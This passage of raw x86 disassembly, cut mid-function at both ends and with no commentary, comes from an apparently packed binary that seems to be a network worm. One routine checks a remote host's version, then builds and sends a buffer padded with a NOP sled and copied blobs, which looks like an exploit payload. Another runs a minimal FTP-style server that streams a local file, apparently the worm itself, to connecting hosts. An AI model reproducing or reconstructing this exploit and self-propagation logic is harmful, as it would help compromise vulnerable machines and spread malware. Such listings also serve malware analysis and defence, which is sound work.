add eax, [ebp+var_204]
mov [ebp+var_1B78], eax
push [ebp+var_370]
lea eax, [ebp+var_200]
push eax
mov eax, [ebp+var_1B78]
lea eax, [ebp+eax+var_B74]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_1B78]
add eax, [ebp+var_370]
mov [ebp+var_1B78], eax
push 168h
lea eax, [ebp+var_36C]
push eax
mov eax, [ebp+var_1B78]
lea eax, [ebp+eax+var_B74]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_1B78]
add eax, 168h
mov [ebp+var_1B78], eax
push 0Ah
push offset off_41A8CC
mov eax, [ebp+var_1B78]
lea eax, [ebp+eax+var_B74]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_1B78]
add eax, 0Ah
mov [ebp+var_1B78], eax
push 32h
push offset dword_41A860
mov eax, [ebp+var_1B78]
lea eax, [ebp+eax+var_B74]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_1B78]
add eax, 32h
mov [ebp+var_1B78], eax
mov eax, [ebp+var_1B78]
mov [ebp+var_B6C], eax
mov eax, [ebp+var_1B78]
sub eax, 18h
mov [ebp+var_B64], eax
push [ebp+var_1B78]
lea eax, [ebp+var_B74]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax+3Eh]
call sub_4053BF
add esp, 0Ch
push 0EA60h
mov eax, [ebp+arg_0]
push dword ptr [eax+3Eh]
call sub_40546E
pop ecx
pop ecx
test eax, eax
jnz short loc_410B36
jmp short locret_410B50
; ---------------------------------------------------------------------------
loc_410B36: ; CODE XREF: sub_410649+4E9�j
push 0
push 1000h
lea eax, [ebp+var_1B74]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax+3Eh]
call ds:dword_417248 ; recv
locret_410B50: ; CODE XREF: sub_410649+38�j
; sub_410649+A2�j ...
leave
retn
sub_410649 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410B52 proc near ; DATA XREF: UPX1:0041CDE8�o
var_104C = byte ptr -104Ch
var_FC6 = byte ptr -0FC6h
var_BDE = byte ptr -0BDEh
var_B9E = byte ptr -0B9Eh
var_B7C = dword ptr -0B7Ch
var_B78 = byte ptr -0B78h
var_AF2 = byte ptr -0AF2h
var_88E = byte ptr -88Eh
var_882 = byte ptr -882h
var_85E = byte ptr -85Eh
var_852 = byte ptr -852h
var_82E = byte ptr -82Eh
var_80C = byte ptr -80Ch
var_7CC = byte ptr -7CCh
var_7C8 = byte ptr -7C8h
var_20C = dword ptr -20Ch
var_208 = byte ptr -208h
var_204 = byte ptr -204h
var_4 = byte ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 104Ch
call sub_416BC0
push 7
push offset dword_41A7A8
mov eax, [ebp+arg_0]
push dword ptr [eax+2Ah]
mov eax, [ebp+arg_0]
add eax, 146h
push eax
mov eax, [ebp+arg_0]
add eax, 0C6h
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax+0C2h]
push 200h
lea eax, [ebp+var_204]
push eax
call sub_4125DF
add esp, 20h
mov [ebp+var_20C], eax
cmp [ebp+var_20C], 0
jnz short loc_410BAF
jmp locret_410F5E
; ---------------------------------------------------------------------------
loc_410BAF: ; CODE XREF: sub_410B52+56�j
push 89h
push offset dword_41AF50
mov eax, [ebp+arg_0]
push dword ptr [eax+3Eh]
call sub_4053BF
add esp, 0Ch
push 2710h
push 600h
lea eax, [ebp+var_80C]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax+3Eh]
call sub_405443
add esp, 10h
test eax, eax
jnz short loc_410BEF
jmp locret_410F5E
; ---------------------------------------------------------------------------
loc_410BEF: ; CODE XREF: sub_410B52+96�j
push 0A8h
push offset dword_41AFDC
mov eax, [ebp+arg_0]
push dword ptr [eax+3Eh]
call sub_4053BF
add esp, 0Ch
push 2710h
push 600h
lea eax, [ebp+var_80C]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax+3Eh]
call sub_405443
add esp, 10h
test eax, eax
jnz short loc_410C2F
jmp locret_410F5E
; ---------------------------------------------------------------------------
loc_410C2F: ; CODE XREF: sub_410B52+D6�j
push 0DEh
push offset dword_41B088
mov eax, [ebp+arg_0]
push dword ptr [eax+3Eh]
call sub_4053BF
add esp, 0Ch
push 2710h
push 600h
lea eax, [ebp+var_80C]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax+3Eh]
call sub_405443
add esp, 10h
test eax, eax
jnz short loc_410C6F
jmp locret_410F5E
; ---------------------------------------------------------------------------
loc_410C6F: ; CODE XREF: sub_410B52+116�j
movsx eax, [ebp+var_7CC]
sub eax, 30h
mov [ebp+var_208], al
movsx eax, [ebp+var_7C8]
sub eax, 30h
mov [ebp+var_4], al
push 3Eh
push offset dword_41B168
mov eax, [ebp+arg_0]
push dword ptr [eax+3Eh]
call sub_4053BF
add esp, 0Ch
push 2710h
push 600h
lea eax, [ebp+var_80C]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax+3Eh]
call sub_405443
add esp, 10h
test eax, eax
jnz short loc_410CC9
jmp locret_410F5E
; ---------------------------------------------------------------------------
loc_410CC9: ; CODE XREF: sub_410B52+170�j
push 60h
push offset dword_41B1A8
mov eax, [ebp+arg_0]
push dword ptr [eax+3Eh]
call sub_4053BF
add esp, 0Ch
push 2710h
push 600h
lea eax, [ebp+var_80C]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax+3Eh]
call sub_405443
add esp, 10h
test eax, eax
jnz short loc_410D06
jmp locret_410F5E
; ---------------------------------------------------------------------------
loc_410D06: ; CODE XREF: sub_410B52+1AD�j
push 0A0h
push offset dword_41B20C
mov eax, [ebp+arg_0]
push dword ptr [eax+3Eh]
call sub_4053BF
add esp, 0Ch
push 2710h
push 600h
lea eax, [ebp+var_80C]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax+3Eh]
call sub_405443
add esp, 10h
test eax, eax
jnz short loc_410D46
jmp locret_410F5E
; ---------------------------------------------------------------------------
loc_410D46: ; CODE XREF: sub_410B52+1ED�j
movsx eax, [ebp+var_208]
cmp eax, 5
jnz loc_410E71
movsx eax, [ebp+var_4]
cmp eax, 1
jnz loc_410E71
push 86h
push offset dword_41B2B0
lea eax, [ebp+var_B78]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+var_20C]
lea eax, [ebp+var_204]
push eax
lea eax, [ebp+var_AF2]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 0
mov eax, 264h
sub eax, [ebp+var_20C]
add eax, 60h
push eax
mov eax, [ebp+var_20C]
lea eax, [ebp+eax+var_AF2]
push eax
call sub_410F60
add esp, 0Ch
push 4
push offset dword_41B410
lea eax, [ebp+var_88E]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 4
push offset dword_41B408
lea eax, [ebp+var_882]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 4
push offset dword_41B408
lea eax, [ebp+var_85E]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 4
push offset dword_41B408
lea eax, [ebp+var_852]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 20h
push offset dword_41B338
lea eax, [ebp+var_82E]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 36Ah
lea eax, [ebp+var_B78]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax+3Eh]
call sub_4053BF
add esp, 0Ch
push 400h
call ds:dword_41709C ; Sleep
push 36Ah
lea eax, [ebp+var_B78]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax+3Eh]
call sub_4053BF
add esp, 0Ch
jmp locret_410F5E
; ---------------------------------------------------------------------------
loc_410E71: ; CODE XREF: sub_410B52+1FE�j
; sub_410B52+20B�j
movsx eax, [ebp+var_208]
cmp eax, 5
jnz short loc_410E85
movsx eax, [ebp+var_4]
test eax, eax
jz short loc_410E95
loc_410E85: ; CODE XREF: sub_410B52+329�j
movsx eax, [ebp+var_208]
cmp eax, 4
jnz locret_410F5E
loc_410E95: ; CODE XREF: sub_410B52+331�j
push 86h
push offset dword_41B35C
lea eax, [ebp+var_104C]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, 3E8h
sub eax, [ebp+var_20C]
push eax
push 90h
lea eax, [ebp+var_FC6]
push eax
call sub_416B6A ; memset
add esp, 0Ch
push [ebp+var_20C]
lea eax, [ebp+var_204]
push eax
lea eax, [ebp+var_BDE]
sub eax, [ebp+var_20C]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
and [ebp+var_B7C], 0
jmp short loc_410F06
; ---------------------------------------------------------------------------
loc_410EF9: ; CODE XREF: sub_410B52+3DA�j
mov eax, [ebp+var_B7C]
inc eax
mov [ebp+var_B7C], eax
loc_410F06: ; CODE XREF: sub_410B52+3A5�j
cmp [ebp+var_B7C], 10h
jge short loc_410F2E
push 4
push offset dword_41B408
mov eax, [ebp+var_B7C]
lea eax, [ebp+eax*4+var_BDE]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
jmp short loc_410EF9
; ---------------------------------------------------------------------------
loc_410F2E: ; CODE XREF: sub_410B52+3BB�j
push 20h
push offset dword_41B3E4
lea eax, [ebp+var_B9E]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 4CEh
lea eax, [ebp+var_104C]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax+3Eh]
call sub_4053BF
add esp, 0Ch
locret_410F5E: ; CODE XREF: sub_410B52+58�j
; sub_410B52+98�j ...
leave
retn
sub_410B52 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410F60 proc near ; CODE XREF: sub_410B52+265�p
var_10 = byte ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
cmp [ebp+arg_8], 0
jnz short loc_410FA4
and [ebp+var_4], 0
jmp short loc_410F79
; ---------------------------------------------------------------------------
loc_410F72: ; CODE XREF: sub_410F60+3D�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_410F79: ; CODE XREF: sub_410F60+10�j
mov eax, [ebp+var_4]
cmp eax, [ebp+arg_4]
jnb short loc_410F9F
push 20h
push 0
call sub_4103F5
pop ecx
pop ecx
imul eax, 5
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov al, ds:byte_41BB00[eax]
mov [ecx], al
jmp short loc_410F72
; ---------------------------------------------------------------------------
loc_410F9F: ; CODE XREF: sub_410F60+1F�j
jmp locret_41102D
; ---------------------------------------------------------------------------
loc_410FA4: ; CODE XREF: sub_410F60+A�j
cmp [ebp+arg_8], 7Fh
jnz short loc_410FDF
and [ebp+var_8], 0
jmp short loc_410FB7
; ---------------------------------------------------------------------------
loc_410FB0: ; CODE XREF: sub_410F60+7B�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_410FB7: ; CODE XREF: sub_410F60+4E�j
mov eax, [ebp+var_8]
cmp eax, [ebp+arg_4]
jnb short loc_410FDD
push 5
push 0
call sub_4103F5
pop ecx
pop ecx
imul eax, 5
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_8]
mov al, ds:byte_41BB00[eax]
mov [ecx], al
jmp short loc_410FB0
; ---------------------------------------------------------------------------
loc_410FDD: ; CODE XREF: sub_410F60+5D�j
jmp short locret_41102D
; ---------------------------------------------------------------------------
loc_410FDF: ; CODE XREF: sub_410F60+48�j
and [ebp+var_C], 0
loc_410FE3: ; CODE XREF: sub_410F60+AD�j
; sub_410F60+CB�j
mov eax, [ebp+var_C]
cmp eax, [ebp+arg_4]
jnb short locret_41102D
push 20h
push 0
call sub_4103F5
pop ecx
pop ecx
mov [ebp+var_10], al
movsx eax, [ebp+var_10]
imul eax, 5
mov ecx, [ebp+arg_8]
and ecx, ds:dword_41BB01[eax]
test ecx, ecx
jz short loc_41100F
jmp short loc_410FE3
; ---------------------------------------------------------------------------
loc_41100F: ; CODE XREF: sub_410F60+AB�j
movsx eax, [ebp+var_10]
imul eax, 5
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_C]
mov al, ds:byte_41BB00[eax]
mov [ecx], al
mov eax, [ebp+var_C]
inc eax
mov [ebp+var_C], eax
jmp short loc_410FE3
; ---------------------------------------------------------------------------
locret_41102D: ; CODE XREF: sub_410F60:loc_410F9F�j
; sub_410F60:loc_410FDD�j ...
leave
retn
sub_410F60 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41102F proc near ; CODE XREF: sub_41113B+79B�p
var_210 = dword ptr -210h
var_20C = dword ptr -20Ch
var_208 = dword ptr -208h
var_204 = dword ptr -204h
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 210h
push 0EA60h
push 0
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4050EA
add esp, 10h
mov [ebp+var_204], eax
cmp [ebp+var_204], 0
jz short loc_411065
cmp [ebp+var_204], 0FFFFFFFFh
jnz short loc_41106C
loc_411065: ; CODE XREF: sub_41102F+2B�j
xor eax, eax
jmp locret_411139
; ---------------------------------------------------------------------------
loc_41106C: ; CODE XREF: sub_41102F+34�j
push offset aRb ; "rb"
push offset dword_41EBFC
call sub_416B88 ; fopen
pop ecx
pop ecx
mov [ebp+var_208], eax
cmp [ebp+var_208], 0
jnz short loc_41109F
push [ebp+var_204]
call sub_4053B1
pop ecx
xor eax, eax
jmp locret_411139
; ---------------------------------------------------------------------------
loc_41109F: ; CODE XREF: sub_41102F+5B�j
; sub_41102F:loc_41111C�j
mov eax, [ebp+var_208]
mov eax, [eax+0Ch]
and eax, 10h
test eax, eax
jnz short loc_41111E
push [ebp+var_208]
push 200h
push 1
lea eax, [ebp+var_200]
push eax
call sub_416B90 ; fread
add esp, 10h
mov [ebp+var_20C], eax
push [ebp+var_20C]
lea eax, [ebp+var_200]
push eax
push [ebp+var_204]
call sub_4053BF
add esp, 0Ch
mov [ebp+var_210], eax
mov eax, [ebp+var_20C]
cmp eax, [ebp+var_210]
jz short loc_41111C
push [ebp+var_204]
call sub_4053B1
pop ecx
push [ebp+var_208]
call sub_416B82 ; fclose
pop ecx
xor eax, eax
jmp short locret_411139
; ---------------------------------------------------------------------------
loc_41111C: ; CODE XREF: sub_41102F+CF�j
jmp short loc_41109F
; ---------------------------------------------------------------------------
loc_41111E: ; CODE XREF: sub_41102F+7E�j
push [ebp+var_204]
call sub_40538D
pop ecx
push [ebp+var_208]
call sub_416B82 ; fclose
pop ecx
push 1
pop eax
locret_411139: ; CODE XREF: sub_41102F+38�j
; sub_41102F+6B�j ...
leave
retn
sub_41102F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41113B proc near ; DATA XREF: sub_411BBC+156�o
var_558 = dword ptr -558h
var_554 = dword ptr -554h
var_550 = dword ptr -550h
var_54C = dword ptr -54Ch
var_548 = dword ptr -548h
var_544 = dword ptr -544h
var_540 = byte ptr -540h
var_53C = byte ptr -53Ch
var_538 = byte ptr -538h
var_534 = dword ptr -534h
var_530 = byte ptr -530h
var_52C = dword ptr -52Ch
var_528 = dword ptr -528h
var_524 = dword ptr -524h
var_520 = dword ptr -520h
var_51C = dword ptr -51Ch
var_518 = byte ptr -518h
var_318 = byte ptr -318h
var_118 = dword ptr -118h
var_114 = byte ptr -114h
var_113 = byte ptr -113h
var_10C = dword ptr -10Ch
var_108 = dword ptr -108h
var_104 = byte ptr -104h
var_103 = byte ptr -103h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 558h
push edi
mov eax, [ebp+arg_0]
mov [ebp+var_10C], eax
push offset dword_41C6B0
push 200h
lea eax, [ebp+var_518]
push eax
call sub_416BAE ; _snprintf
add esp, 0Ch
lea eax, [ebp+var_518]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_518]
push eax
push [ebp+var_10C]
call sub_4053BF
add esp, 0Ch
mov al, ds:byte_41DF00
mov [ebp+var_104], al
push 3Fh
pop ecx
xor eax, eax
lea edi, [ebp+var_103]
rep stosd
stosw
stosb
mov al, ds:byte_41DF00
mov [ebp+var_114], al
xor eax, eax
lea edi, [ebp+var_113]
stosd
stosb
and [ebp+var_4], 0
and [ebp+var_118], 0
and [ebp+var_108], 0
loc_4111CC: ; CODE XREF: sub_41113B+10C�j
; sub_41113B+1BD�j ...
push 0EA60h
push [ebp+var_10C]
call sub_40546E
pop ecx
pop ecx
test eax, eax
jz loc_4119BA
push 200h
lea eax, [ebp+var_318]
push eax
push [ebp+var_10C]
call sub_4053DC
add esp, 0Ch
mov [ebp+var_520], eax
cmp [ebp+var_520], 0
jz short loc_411218
cmp [ebp+var_520], 0FFFFFFFFh
jnz short loc_41121D
loc_411218: ; CODE XREF: sub_41113B+D2�j
jmp loc_4119BA
; ---------------------------------------------------------------------------
loc_41121D: ; CODE XREF: sub_41113B+DB�j
lea eax, [ebp+var_108]
push eax
push offset dword_41C6AC
lea eax, [ebp+var_318]
push eax
call sub_40813C
add esp, 0Ch
mov [ebp+var_528], eax
cmp [ebp+var_528], 0
jnz short loc_411249
jmp short loc_4111CC
; ---------------------------------------------------------------------------
loc_411249: ; CODE XREF: sub_41113B+10A�j
lea eax, [ebp+var_108]
push eax
push offset dword_41C6AC
push 0
call sub_40813C
add esp, 0Ch
mov [ebp+var_51C], eax
cmp [ebp+var_51C], 0
jnz short loc_411278
mov [ebp+var_51C], offset byte_41DF00
loc_411278: ; CODE XREF: sub_41113B+131�j
lea eax, [ebp+var_108]
push eax
push offset dword_41C6AC
push 0
call sub_40813C
add esp, 0Ch
push [ebp+var_528]
call sub_40ED38
pop ecx
mov [ebp+var_524], eax
mov eax, [ebp+var_524]
sub eax, ds:dword_41C6A0
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_4112FD
mov [ebp+var_4], 1
push offset dword_41C698
push 200h
lea eax, [ebp+var_518]
push eax
call sub_416BAE ; _snprintf
add esp, 0Ch
lea eax, [ebp+var_518]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_518]
push eax
push [ebp+var_10C]
call sub_4053BF
add esp, 0Ch
jmp loc_4111CC
; ---------------------------------------------------------------------------
loc_4112FD: ; CODE XREF: sub_41113B+178�j
mov eax, [ebp+var_524]
sub eax, ds:dword_41C68C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_41135D
mov [ebp+var_118], 1
push offset dword_41C684
push 200h
lea eax, [ebp+var_518]
push eax
call sub_416BAE ; _snprintf
add esp, 0Ch
lea eax, [ebp+var_518]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_518]
push eax
push [ebp+var_10C]
call sub_4053BF
add esp, 0Ch
jmp loc_4111CC
; ---------------------------------------------------------------------------
loc_41135D: ; CODE XREF: sub_41113B+1D5�j
cmp [ebp+var_4], 0
jz short loc_41136C
cmp [ebp+var_118], 0
jnz short loc_411371
loc_41136C: ; CODE XREF: sub_41113B+226�j
jmp loc_4111CC
; ---------------------------------------------------------------------------
loc_411371: ; CODE XREF: sub_41113B+22F�j
mov eax, [ebp+var_524]
sub eax, ds:dword_41C678
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_4113C7
push offset dword_41C670
push 200h
lea eax, [ebp+var_518]
push eax
call sub_416BAE ; _snprintf
add esp, 0Ch
lea eax, [ebp+var_518]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_518]
push eax
push [ebp+var_10C]
call sub_4053BF
add esp, 0Ch
jmp loc_4111CC
; ---------------------------------------------------------------------------
loc_4113C7: ; CODE XREF: sub_41113B+249�j
mov eax, [ebp+var_524]
sub eax, ds:dword_41C664
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_41141D
push offset dword_41C65C
push 200h
lea eax, [ebp+var_518]
push eax
call sub_416BAE ; _snprintf
add esp, 0Ch
lea eax, [ebp+var_518]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_518]
push eax
push [ebp+var_10C]
call sub_4053BF
add esp, 0Ch
jmp loc_4111CC
; ---------------------------------------------------------------------------
loc_41141D: ; CODE XREF: sub_41113B+29F�j
mov eax, [ebp+var_524]
sub eax, ds:dword_41C654
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_411473
push offset dword_41C648
push 200h
lea eax, [ebp+var_518]
push eax
call sub_416BAE ; _snprintf
add esp, 0Ch
lea eax, [ebp+var_518]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_518]
push eax
push [ebp+var_10C]
call sub_4053BF
add esp, 0Ch
jmp loc_4111CC
; ---------------------------------------------------------------------------
loc_411473: ; CODE XREF: sub_41113B+2F5�j
mov eax, [ebp+var_524]
sub eax, ds:dword_41C63C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_4114C9
push offset dword_41C634
push 200h
lea eax, [ebp+var_518]
push eax
call sub_416BAE ; _snprintf
add esp, 0Ch
lea eax, [ebp+var_518]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_518]
push eax
push [ebp+var_10C]
call sub_4053BF
add esp, 0Ch
jmp loc_4111CC
; ---------------------------------------------------------------------------
loc_4114C9: ; CODE XREF: sub_41113B+34B�j
mov eax, [ebp+var_524]
sub eax, ds:dword_41C628
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_41151F
push offset dword_41C620
push 200h
lea eax, [ebp+var_518]
push eax
call sub_416BAE ; _snprintf
add esp, 0Ch
lea eax, [ebp+var_518]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_518]
push eax
push [ebp+var_10C]
call sub_4053BF
add esp, 0Ch
jmp loc_4111CC
; ---------------------------------------------------------------------------
loc_41151F: ; CODE XREF: sub_41113B+3A1�j
mov eax, [ebp+var_524]
sub eax, ds:dword_41C614
neg eax
sbb eax, eax
inc eax
test eax, eax
jz loc_411622
lea eax, [ebp+var_534]
push eax
lea eax, [ebp+var_52C]
push eax
lea eax, [ebp+var_540]
push eax
lea eax, [ebp+var_53C]
push eax
lea eax, [ebp+var_538]
push eax
lea eax, [ebp+var_530]
push eax
push offset aUUUUUU ; "%u,%u,%u,%u,%u,%u"
push [ebp+var_51C]
call sub_416BA2 ; sscanf
add esp, 20h
movzx eax, [ebp+var_540]
push eax
movzx eax, [ebp+var_53C]
push eax
movzx eax, [ebp+var_538]
push eax
movzx eax, [ebp+var_530]
push eax
push offset dword_418A50
push 100h
lea eax, [ebp+var_104]
push eax
call sub_416BAE ; _snprintf
add esp, 1Ch
mov eax, [ebp+var_52C]
and eax, 0FFh
shl eax, 8
mov ecx, [ebp+var_534]
and ecx, 0FFh
or eax, ecx
push eax
push offset dword_418A60
push 6
lea eax, [ebp+var_114]
push eax
call sub_416BAE ; _snprintf
add esp, 10h
push offset dword_41C634
push 200h
lea eax, [ebp+var_518]
push eax
call sub_416BAE ; _snprintf
add esp, 0Ch
lea eax, [ebp+var_518]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_518]
push eax
push [ebp+var_10C]
call sub_4053BF
add esp, 0Ch
jmp loc_4111CC
; ---------------------------------------------------------------------------
loc_411622: ; CODE XREF: sub_41113B+3F7�j
mov eax, [ebp+var_524]
sub eax, ds:dword_41C5F4
neg eax
sbb eax, eax
inc eax
test eax, eax
jz loc_4116E9
push offset aRb ; "rb"
push offset dword_41EBFC
call sub_416B88 ; fopen
pop ecx
pop ecx
mov [ebp+var_548], eax
cmp [ebp+var_548], 0
jnz short loc_411660
jmp loc_4119BA
; ---------------------------------------------------------------------------
loc_411660: ; CODE XREF: sub_41113B+51E�j
push 2
push 0
push [ebp+var_548]
call sub_416B96 ; fseek
add esp, 0Ch
push [ebp+var_548]
call sub_416B76 ; ftell
pop ecx
mov [ebp+var_544], eax
push 0
push 0
push [ebp+var_548]
call sub_416B96 ; fseek
add esp, 0Ch
push [ebp+var_548]
call sub_416B82 ; fclose
pop ecx
push [ebp+var_544]
push offset dword_41C5E8
push 200h
lea eax, [ebp+var_518]
push eax
call sub_416BAE ; _snprintf
add esp, 10h
lea eax, [ebp+var_518]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_518]
push eax
push [ebp+var_10C]
call sub_4053BF
add esp, 0Ch
jmp loc_4111CC
; ---------------------------------------------------------------------------
loc_4116E9: ; CODE XREF: sub_41113B+4FA�j
mov eax, [ebp+var_524]
sub eax, ds:dword_41C5DC
neg eax
sbb eax, eax
inc eax
test eax, eax
jz loc_411873
push offset a150 ; "150 -\r\n"
push 200h
lea eax, [ebp+var_518]
push eax
call sub_416BAE ; _snprintf
add esp, 0Ch
lea eax, [ebp+var_518]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_518]
push eax
push [ebp+var_10C]
call sub_4053BF
add esp, 0Ch
push 2710h
push 0
lea eax, [ebp+var_114]
push eax
lea eax, [ebp+var_104]
push eax
call sub_4050EA
add esp, 10h
mov [ebp+var_54C], eax
cmp [ebp+var_54C], 0
jz short loc_411773
cmp [ebp+var_54C], 0FFFFFFFFh
jnz short loc_411778
loc_411773: ; CODE XREF: sub_41113B+62D�j
jmp loc_4119BA
; ---------------------------------------------------------------------------
loc_411778: ; CODE XREF: sub_41113B+636�j
push offset aRb ; "rb"
push offset dword_41EBFC
call sub_416B88 ; fopen
pop ecx
pop ecx
mov [ebp+var_554], eax
cmp [ebp+var_554], 0
jnz short loc_41179D
jmp loc_4119BA
; ---------------------------------------------------------------------------
loc_41179D: ; CODE XREF: sub_41113B+65B�j
push 2
push 0
push [ebp+var_554]
call sub_416B96 ; fseek
add esp, 0Ch
push [ebp+var_554]
call sub_416B76 ; ftell
pop ecx
mov [ebp+var_550], eax
push 0
push 0
push [ebp+var_554]
call sub_416B96 ; fseek
add esp, 0Ch
push [ebp+var_554]
call sub_416B82 ; fclose
pop ecx
push offset dword_41EBFC
push [ebp+var_550]
push offset aX32000Fh1024Ja ; "-x 3 2000 fh 1024 Jan 1 0:00 .\r\ndrwxr-x"...
push 200h
lea eax, [ebp+var_518]
push eax
call sub_416BAE ; _snprintf
add esp, 14h
lea eax, [ebp+var_518]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_518]
push eax
push [ebp+var_54C]
call sub_4053BF
add esp, 0Ch
push [ebp+var_54C]
call sub_40538D
pop ecx
push offset dword_41C558
push 200h
lea eax, [ebp+var_518]
push eax
call sub_416BAE ; _snprintf
add esp, 0Ch
lea eax, [ebp+var_518]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_518]
push eax
push [ebp+var_10C]
call sub_4053BF
add esp, 0Ch
jmp loc_4111CC
; ---------------------------------------------------------------------------
loc_411873: ; CODE XREF: sub_41113B+5C1�j
mov eax, [ebp+var_524]
sub eax, ds:dword_41C54C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz loc_411969
push offset a150 ; "150 -\r\n"
push 200h
lea eax, [ebp+var_518]
push eax
call sub_416BAE ; _snprintf
add esp, 0Ch
lea eax, [ebp+var_518]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_518]
push eax
push [ebp+var_10C]
call sub_4053BF
add esp, 0Ch
lea eax, [ebp+var_114]
push eax
lea eax, [ebp+var_104]
push eax
call sub_41102F
pop ecx
pop ecx
test eax, eax
jz loc_411967
push offset dword_41C558
push 200h
lea eax, [ebp+var_518]
push eax
call sub_416BAE ; _snprintf
add esp, 0Ch
lea eax, [ebp+var_518]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_518]
push eax
push [ebp+var_10C]
call sub_4053BF
add esp, 0Ch
push 1
push offset dword_41EBD8
call sub_409C88
pop ecx
pop ecx
inc eax
mov [ebp+var_558], eax
lea eax, [ebp+var_104]
push eax
push [ebp+var_558]
push offset aFtp_0 ; "ftp"
push offset unk_41C520
push offset dword_41DB88
call sub_40D4AB
add esp, 14h
push 3E8h
call ds:dword_41709C ; Sleep
jmp short loc_4119BA
; ---------------------------------------------------------------------------
loc_411967: ; CODE XREF: sub_41113B+7A4�j
jmp short loc_4119BA
; ---------------------------------------------------------------------------
loc_411969: ; CODE XREF: sub_41113B+74B�j
mov eax, [ebp+var_524]
sub eax, ds:dword_41C514
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_4119BA
push offset a221 ; "221 -\r\n"
push 200h
lea eax, [ebp+var_518]
push eax
call sub_416BAE ; _snprintf
add esp, 0Ch
lea eax, [ebp+var_518]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_518]
push eax
push [ebp+var_10C]
call sub_4053BF
add esp, 0Ch
loc_4119BA: ; CODE XREF: sub_41113B+A5�j
; sub_41113B:loc_411218�j ...
push offset a231 ; "231 -\r\n"
push 200h
lea eax, [ebp+var_518]
push eax
call sub_416BAE ; _snprintf
add esp, 0Ch
lea eax, [ebp+var_518]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_518]
push eax
push [ebp+var_10C]
call sub_4053BF
add esp, 0Ch
push [ebp+var_10C]
call sub_40538D
pop ecx
xor eax, eax
pop edi
leave
retn 4
sub_41113B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411A09 proc near ; CODE XREF: sub_411BBC+90�p
var_204 = dword ptr -204h
var_200 = byte ptr -200h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 204h
push 32h
